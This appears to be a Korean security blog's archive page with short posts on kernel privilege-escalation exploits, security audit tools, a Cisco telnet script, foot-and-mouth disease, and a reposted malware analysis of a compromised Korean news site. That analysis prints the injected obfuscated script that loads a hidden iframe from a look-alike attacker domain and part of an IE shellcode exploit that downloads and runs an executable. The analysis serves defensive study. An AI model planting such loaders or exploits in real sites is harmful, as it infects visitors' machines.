테스트 버전 : FreeBSD 6.1
취약점 : FreeBSD 6.1 이하 버전에 kqueue() 함수의 Null Pointer 핸들링 취약점을 이용한 공격
- 2011/02/16 00:04
- coderant.egloos.com/5440589
- 덧글수 : 0
- 2011/02/16 00:02
- coderant.egloos.com/5440586
- 덧글수 : 0
리눅스 커널 2.4/2.6 버전의 sock_sendpage()함수의 버그를 이용한 root 권한 상승 취약점
출처는 이름 없는 여기저기 중국 보안블로그 사이트에서 찾다보니 있네요
Tested RedHat Linux 9.0, Fedora core 4~11, Whitebox 4, CentOS 4.x.
- 2011/01/26 00:53
- coderant.egloos.com/5429402
- 덧글수 : 0
요즘 전국토가 구제역으로 축산농이 거의 재앙에 가까운 일을 겪고 있습니다. 어제 MBC PD 수첩에서 돼지들이 생매장 되는 장면이 나왔는데 정말 끔찍하더군요. 구제역으로 공무원들도 과로사로 5명이나 순직하신 분들도 있고 많은 축산농 분들이 눈물을 흘리는 것을 보니 참 맘이 아픕니다. 나랑 구제역하고 상관없어 라고 생각하는 분들도 계실 거고 구제역에 대해서 무관심한 분들도 있을 거 같아서 구제역이라는 것이 도대체 어떤 병인가 무척 궁금해서 찾아봤습니다.
우리 모두 구제역에 대해서 관심좀 가지고 하루 빨리 구제역을 없어지길 기원하고 지금도 고생하시는 모든 분들에게 조금이나 힘내라고 말하고 싶습니다. 물론 다들 생활이 바쁜 것은 있겠지만 중요한 사회적 이슈에 대해서 관심을 많이 가져야겠다는 생각을 하게 된 하루였습니다.
불쌍하게 죽은 소, 돼지들의 안식도 빌어주고 싶네요. 오늘날 의료생명공학 기술이 발전했다고 하는데 완벽한 구제역 백신 제작이 거의 어렵다고 합니다.
1. 병명 : 구제역(Foot and mouth disease)
2. 증상 : 소, 양 등 말굽이 두갈래 동물에게 걸리는 전염성 높은 병이라고 합니다. 제1종 법정 가축전염병중에서도 A급 악성 바이러 스로 소의 전염병이나, 돼지,양,사슴,코끼리등과 같이 발굽이 둘로 갈라진 동물에서 발생함
-. 체온의 급격한 상승과, 입 혀 발굽 젖꼭지 등에 물집
- .식욕이 떨어져 심하게 앓거나 죽게 됨
-. 사람에 대한 감염되지 않음.
발굽이나 소 혀에 물집이 생기면서 살이 괴사한다고 합니다.
2. 원인균 피코르나 바이러스(Picornavius)의 원 모습
구제역은 O, A, C, SAT-1, SAT-2, SAT-3, Asia-1와 같은 7가지 혈청형이 있고, 그 중 O형이 가장 흔하다
형태 : 20면체, 20~25 nm, 분자량 : 8.6 X 10 6승 Da (도통 무슨용어인지 하나돌 모르겠음)
피코르나 바이러스 참고자료) http://www.microbiologybytes.com/virology/Picornaviruses.html
우리 모두 구제역에 대해서 관심좀 가지고 하루 빨리 구제역을 없어지길 기원하고 지금도 고생하시는 모든 분들에게 조금이나 힘내라고 말하고 싶습니다. 물론 다들 생활이 바쁜 것은 있겠지만 중요한 사회적 이슈에 대해서 관심을 많이 가져야겠다는 생각을 하게 된 하루였습니다.
불쌍하게 죽은 소, 돼지들의 안식도 빌어주고 싶네요. 오늘날 의료생명공학 기술이 발전했다고 하는데 완벽한 구제역 백신 제작이 거의 어렵다고 합니다.
1. 병명 : 구제역(Foot and mouth disease)
2. 증상 : 소, 양 등 말굽이 두갈래 동물에게 걸리는 전염성 높은 병이라고 합니다. 제1종 법정 가축전염병중에서도 A급 악성 바이러 스로 소의 전염병이나, 돼지,양,사슴,코끼리등과 같이 발굽이 둘로 갈라진 동물에서 발생함
-. 체온의 급격한 상승과, 입 혀 발굽 젖꼭지 등에 물집
- .식욕이 떨어져 심하게 앓거나 죽게 됨
-. 사람에 대한 감염되지 않음.
발굽이나 소 혀에 물집이 생기면서 살이 괴사한다고 합니다.
2. 원인균 피코르나 바이러스(Picornavius)의 원 모습
구제역은 O, A, C, SAT-1, SAT-2, SAT-3, Asia-1와 같은 7가지 혈청형이 있고, 그 중 O형이 가장 흔하다
형태 : 20면체, 20~25 nm, 분자량 : 8.6 X 10 6승 Da (도통 무슨용어인지 하나돌 모르겠음)
피코르나 바이러스 참고자료) http://www.microbiologybytes.com/virology/Picornaviruses.html
- 2011/01/25 10:34
- coderant.egloos.com/5428969
- 덧글수 : 0
이 글의 원 출처는 http://blog.armorize.com에 수록된 내용입니다.
Recently we've been thinking about how to generate some statistics for malvertising.
Sometimes it's tricky, because nowadays more and more drive-by downloads try to hide themselves by disguising as coming from ad servers.
Here's an example. Recently our scanners reported that betanews.net, a Korean news website ranking 671 in Korea, was serving live drive-by downloads.
Well, it indeed is, as we write.
In its index page, www.betanews.net contains the following javascript, which displays ad banners:
/js/banner.js was compromised and the following malicious script was inserted at the end of the file:
Which, after decoding,writes the following:
This "ilikec1ick.com" domain apparently tries to resemble "ilikeclick.com", which is a Korean ad network:
http://ad.ilikec1ick.com/ad.asp contains the javascript exploit:
This is an iepeers (CVE-2010-0806)exploit; after successful exploitation, the browser downloads and executes http://weniz.co.kr/mall/updir/cs/pds.exe.
The exploit, ad.asp, triggers 7/32 on VirusTotal, and the malware, pds.exe, triggers 27/42.
OK, and so, is this a drive-by download attack, or a malvertising attack?
Very similar to the previous "adshufffle.com" malvertising incident, this incident also involves a malicious domain "ilikec1ick.com" which resembles "ilikeclick.com".
So should this be categorized as a malvertising incident? I would say no. I don't think the attacker registered ilikec1ick.com and then tricked betanews.net to take on his ad. I think in this case, he simply hacked into betanews.com and modified their banner.js file. However, in order to prolong the lifespan of this drive-by download operation, he's registered his malicious domain to resemble an ad network, hoping that this would reduce the chance of someone noticing something funny.
This is one of the challenges we currently face at generating malvertising statistics. Although malvertising, mass sql injections, mass hosting compromises, mass wordpress injections, and individual hacks such as this case, all often end up serving drive-by downloads (Web malware), the threats should be categorized differently from a "point of entry" standpoint. However, doing so requires quite some manual labor.
Wayne
PS: Last time we were able to identify the individualbehind the "adshufffle.com" malvertising attack. Well, how about for this example? We attempted a try.
The domain ilikec1ick.com was registered on Jan 19th by "gxiboy@gmail.com". This fellow posted an ad (in Chinese) last month:
위의 중국어를 번역하면:
Hope to acquire projects (get shell, database, etc)
Region: Korea, Taiwan, US, etc, but no domestic targets (mainland China)
Scope of work: all types of databases, webshell, pentesting
Requirement: Fees start at no less than 450USD / project
Recently we've been thinking about how to generate some statistics for malvertising.
Sometimes it's tricky, because nowadays more and more drive-by downloads try to hide themselves by disguising as coming from ad servers.
Here's an example. Recently our scanners reported that betanews.net, a Korean news website ranking 671 in Korea, was serving live drive-by downloads.
Well, it indeed is, as we write.
In its index page, www.betanews.net contains the following javascript, which displays ad banners:
| <script type="text/javascript" src="/js/banner.js"></script> |
/js/banner.js was compromised and the following malicious script was inserted at the end of the file:
| if(document.cookie.indexOf('xxoo')==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie='xxoo=Yes;path=/;expires='+expires.toGMTString;document.write(unescape("%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%61%64%2E%69%6C%69%6B%65%63%31%69%63%6B%2E%63%6F%6D%2F%61%64%2E%61%73%70%22%20%77%69%64%74%68%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F%69%66%72%61%6D%65%3E"));} |
Which, after decoding,writes the following:
| <iframe src="http://ad.ilikec1ick.com/ad.asp" width=0 height=0></iframe> |
This "ilikec1ick.com" domain apparently tries to resemble "ilikeclick.com", which is a Korean ad network:
http://ad.ilikec1ick.com/ad.asp contains the javascript exploit:
| <script> |
| document.write("<bu"+"tton i"+"d='mon' o"+"ncl"+"ick"+"='sc"+"lick();' S"+"TYLE='DISP"+"LAY"+":NONE'></b"+"utton>"); |
| var eLFGhbswV="%x9090%";var ZyOWqionK="x9090%x5858%x5858%x10EB%x4B5B";var LoLYVDGGQ="%xC933%xB966%x03B8%x3480";var cXbQEhvHS="%xBD0B%xFAE2%x05EB%xEBE8%";var UpiNKTfoo="xFFFF";var GIMIByGgI="%x54FF%xBEA3%xBDBD%xD9E2";var xsBZzgBPo="%x8D1C%";var lXOdHiLAV="xBDBD";var ZzEEOlPoD="%x36BD%xB1FD%xCD36%x1";var SbYhcedXP="0A1%xD53";var xngsAiUQI="6%x36B5%xD74A%xE4A";var KGhCigcMg="C%x0355%xBDBF%x";var iWWZubmWc="2DBD%x455F%x8ED5%x";var pefyOgmGu="BD8F%xD5BD%xCEE8%xCF";var kEqSfhtbi="D8%x36E9%xB1FB%x0";var AObPGCHfF="355%xBDBC%x36BD%xD755%xE4B";var |
| (omitted) |
This is an iepeers (CVE-2010-0806)exploit; after successful exploitation, the browser downloads and executes http://weniz.co.kr/mall/updir/cs/pds.exe.
The exploit, ad.asp, triggers 7/32 on VirusTotal, and the malware, pds.exe, triggers 27/42.
OK, and so, is this a drive-by download attack, or a malvertising attack?
Very similar to the previous "adshufffle.com" malvertising incident, this incident also involves a malicious domain "ilikec1ick.com" which resembles "ilikeclick.com".
So should this be categorized as a malvertising incident? I would say no. I don't think the attacker registered ilikec1ick.com and then tricked betanews.net to take on his ad. I think in this case, he simply hacked into betanews.com and modified their banner.js file. However, in order to prolong the lifespan of this drive-by download operation, he's registered his malicious domain to resemble an ad network, hoping that this would reduce the chance of someone noticing something funny.
This is one of the challenges we currently face at generating malvertising statistics. Although malvertising, mass sql injections, mass hosting compromises, mass wordpress injections, and individual hacks such as this case, all often end up serving drive-by downloads (Web malware), the threats should be categorized differently from a "point of entry" standpoint. However, doing so requires quite some manual labor.
Wayne
PS: Last time we were able to identify the individualbehind the "adshufffle.com" malvertising attack. Well, how about for this example? We attempted a try.
The domain ilikec1ick.com was registered on Jan 19th by "gxiboy@gmail.com". This fellow posted an ad (in Chinese) last month:
接单(拿SHELL 数据库 等等)
接单
地区:韩国 台湾 美国 等等(除国内)
类型:数据库(各种),webshell,渗透项目测试等等
要求:只接3000以上的单子 小单勿扰
找长期合作伙伴 无需定金,拿到后验证过付钱.
联系方式GT [email]Gxiboy@Gmail.com[/email] QQ:9 9 8 3 8 0 8
위의 중국어를 번역하면:
Hope to acquire projects (get shell, database, etc)
Region: Korea, Taiwan, US, etc, but no domestic targets (mainland China)
Scope of work: all types of databases, webshell, pentesting
Requirement: Fees start at no less than 450USD / project
- 2011/01/24 23:25
- coderant.egloos.com/5428735
- 덧글수 : 0
범죄에 이용할 목적으로 만들어 지는 이른바 criemware들은 최근 '익스프로잇 팩(Exploit Pack)'이라는 이름으로 블랙 마켓에서 거래가 되고 있다. Exploit Pack은 사용자 PC의 다양한 취약점을 이용하여 좀비 PC화 시키며 최근 가장 많이 악용되고 있는 것은 어도비 제품들이다.
스티브 잡스가 어도비를 애플에서 채택하지 않은 이유는 나름 이유가 있겠지만 단지 경쟁회사 제품이기때문은 아닐 거 같다.
해커들의 가장 좋은 멋잇감으로 지속적으로 취약점이 나오고 있으며 취약점을 악용한 Exploit Pack에서 가장 인기 있는 공격대상이 되기도 한다. 스티브 잡스는 어도비 프로그램을 리소스 잡아먹는 지저분한 프로그램이라고 혹평을 한 바 있다.
'Exploit Pack'은 러시아나 동유럽 해커들이 주로 만드는 것으로 추정되며 대부분 php로 제작되는 것이 특징이다.
아래 그림을 보면 꽤 유명한 Mpack, BleedingLife 등 Exploit Pack들이 애용하는 취약점이 MS IE와 Adobe Acrobat, Flash다.
- 2011/01/21 21:57
- coderant.egloos.com/5427088
- 덧글수 : 0
Router Defense는 오픈소스 프로젝트 파이션으로 작성된 Cisco IOS 라우터, 스위치 보안 취약성 진단 평가 툴입니다.
간단하게 시스코 라우터, 스위치 Audit 하고 레포팅까지 출력해 줍니다.
Python으로 다양한 오픈소스 보안 툴들이 많이 만들어지는 풍요로운 세상을 꿈꾸며...
사용법은 우선 압축 풀면 Python 파일이 많이 있는데 template.conf 수정해서 출력할 파일 포맷과 저장위치를 정해주면 됩니다.
예) C:\python main.py -c '라우터 설정파일.txt' -t template.conf
결과 Report.html 화면
[다운로드] http://code.google.com/p/routerdefense/downloads/detail?name=RouterDefense-BruCON-2010-version-0.5.zip
간단하게 시스코 라우터, 스위치 Audit 하고 레포팅까지 출력해 줍니다.
Python으로 다양한 오픈소스 보안 툴들이 많이 만들어지는 풍요로운 세상을 꿈꾸며...
사용법은 우선 압축 풀면 Python 파일이 많이 있는데 template.conf 수정해서 출력할 파일 포맷과 저장위치를 정해주면 됩니다.
예) C:\python main.py -c '라우터 설정파일.txt' -t template.conf
[다운로드] http://code.google.com/p/routerdefense/downloads/detail?name=RouterDefense-BruCON-2010-version-0.5.zip
- 2011/01/20 00:14
- coderant.egloos.com/5426137
- 덧글수 : 0
애플의 아이폰 독 연결장치와 관련해 주변기기를 제작할 수 있는 다른 방법이 소개되었습니다. 혹시 스퀘어(Square) 신용 카드 인식기를 아이폰의 3.5mm 헤드폰잭에 꼽으면 전원이 켜지고 데이터가 전송되는 걸 보신 분 있을지도 모르겠지만, 요즘 미시간 대학의 가제티어(Gadgetteers)들은 각종의 DIY 기계들이 같은 테크닉을 사용할 수 있도록 소프트웨어의 소스를 공개하였습니다. 하이잭 프로젝트 팀은 이미 22kHz의 오디오톤에서 7.4밀리와트를 전력을 이용하는 방법을 알아냈고, EKG, 온도, 습도, 모션센서등 여러 가지 프로토타입 보드 시리즈도 만들었습니다. 이 보드들은 데이터를 OS 앱으로부터 8.82 kbaud로 전송할 수 있는데, $2.34(약 2,800원)정도의 재료비만 있으면 가능하다고 합니다. 위에 첨부된 동영상에서 어떻게 전력이 이용되는지 확인할 수 있는데, 관심이 있으신 분은 아래 링크에는여러분이 직접 만들수 있는 설명(영문)이 첨부되었습니다.
(원출처) http://kr.engadget.com/2011/01/19/iphone/
http://player.vimeo.com/video/14453136
- 2011/01/19 23:44
- coderant.egloos.com/5426116
- 덧글수 : 0
Python으로 구현된 Cisco 라우터 자동 접속 Auto-Command 소스입니다. 원 저자 소스코드를 Cisco Router Telnet 접속에 맞게끔 소스코드를 손을 좀 봤습니다.
사용법
-l host ip address
-o host port number(default telnet :23)
-u enable passwd
-e enable mode
-p secret passwd
-c command for running on the Cisco Routert
-t connection timeout seconds
Example: %s -l "127.0.0.1" -o 23 -u user -e en -p 1234 -c "show cdp" -t 10
(다운로드) telnet-cisco.py
Original Source Author : revoman@naver.com
사용법
-l host ip address
-o host port number(default telnet :23)
-u enable passwd
-e enable mode
-p secret passwd
-c command for running on the Cisco Routert
-t connection timeout seconds
Example: %s -l "127.0.0.1" -o 23 -u user -e en -p 1234 -c "show cdp" -t 10
(다운로드) telnet-cisco.py
Original Source Author : revoman@naver.com
- 2011/01/19 23:34
- coderant.egloos.com/5426110
- 덧글수 : 0
Inguma는 오픈소스로 개발되던 자동 모의침투 툴로서 2008년도를 끝으로 프로젝트가 중단되었다가 최근에 다시 개발이 진행중인 오픈소스 프로젝트입니다.
새 버전이 거의 3년 만에 발표되었으며 몇가지 중요한 변화로 GUI 환경으로 재 탄생하였습니다.
Inguma는 기본 구성이 Python으로 개발된 Penetration testing toolkit입니다.
제 개인적인 생각으로는 CAVNAS와 유사한 것 같습니다. 물론 상용 제품에 비해 아직 많이 기능이 부족합니다.
주요 모듈 기능
- Discover hosts 및 정보 수집, fuzz
- 사용자 이름 및 패스워드 brute force 그리고 exploits.
download Inguma 0.2 here: inguma-0.2.tar.gz
더 자세한 것은 여기로 here.
블로그 : http://ingumadev.blogspot.com/2011/01/we-are-back.html
소스코드 레포지터리 : http://code.google.com/p/inguma/
- 2011/01/19 23:21
- coderant.egloos.com/5426100
- 덧글수 : 0
프로그램 기능(Description)
서버시스템 보안 감사 및 포렌직 툴
프로젝트 정보(Project information)
Lynis 는 오픈소스 유닉스 감사 툴입니다. 리눅스 계열 및 솔라리스 10까지 지원합니다.
기본적인 시스템 정보 스캐닝과 설치된 패키지 설정 오류를 점검할 수 있습니다.
이 소프트웨어는 자동적으로 유닉스 시스템의 Audtiting 하고 소프트웨어 패치관리 취약점 및 멀웨어 스캐닝해줍나다.
서버에 설치하지 않고 USB 및 CD로 삽입하여 점검할 수 있는 기능도 제공합니다.
Lynis는 컴플라이언스(Basel II, GLBA, HIPAA, PCI DSS, SOX (Sarbanes-Oxley)) audit도 가능합니다.
Examples of audit tests:
- 사용가능한 인증 방식(Available authentication methods)
- Expired SSL certificates
- Outdated software
- 패스워드 없는 사용자(User accounts without password)
- Incorrect file permissions
- Firewall auditing
지원하는 운영체제(Supported operating systems)
Tested on:
- Arch Linux
- CentOS
- Debian
- Fedora Core 4 and higher
- FreeBSD
- Gentoo
- Knoppix
- Mac OS X
- Mandriva 2007
- OpenBSD 4.x
- OpenSolaris
- OpenSuSE
- PcBSD
- PCLinuxOS
- Red Hat, RHEL 5.x
- Slackware 12.1
- Solaris 10
- Ubuntu
(다운로드) 홈페이지 http://www.rootkit.nl/projects/lynis.html
서버시스템 보안 감사 및 포렌직 툴
프로젝트 정보(Project information)
Lynis 는 오픈소스 유닉스 감사 툴입니다. 리눅스 계열 및 솔라리스 10까지 지원합니다.
기본적인 시스템 정보 스캐닝과 설치된 패키지 설정 오류를 점검할 수 있습니다.
이 소프트웨어는 자동적으로 유닉스 시스템의 Audtiting 하고 소프트웨어 패치관리 취약점 및 멀웨어 스캐닝해줍나다.
서버에 설치하지 않고 USB 및 CD로 삽입하여 점검할 수 있는 기능도 제공합니다.
Lynis는 컴플라이언스(Basel II, GLBA, HIPAA, PCI DSS, SOX (Sarbanes-Oxley)) audit도 가능합니다.
Examples of audit tests:
- 사용가능한 인증 방식(Available authentication methods)
- Expired SSL certificates
- Outdated software
- 패스워드 없는 사용자(User accounts without password)
- Incorrect file permissions
- Firewall auditing
지원하는 운영체제(Supported operating systems)
Tested on:
- Arch Linux
- CentOS
- Debian
- Fedora Core 4 and higher
- FreeBSD
- Gentoo
- Knoppix
- Mac OS X
- Mandriva 2007
- OpenBSD 4.x
- OpenSolaris
- OpenSuSE
- PcBSD
- PCLinuxOS
- Red Hat, RHEL 5.x
- Slackware 12.1
- Solaris 10
- Ubuntu
(다운로드) 홈페이지 http://www.rootkit.nl/projects/lynis.html
최근 덧글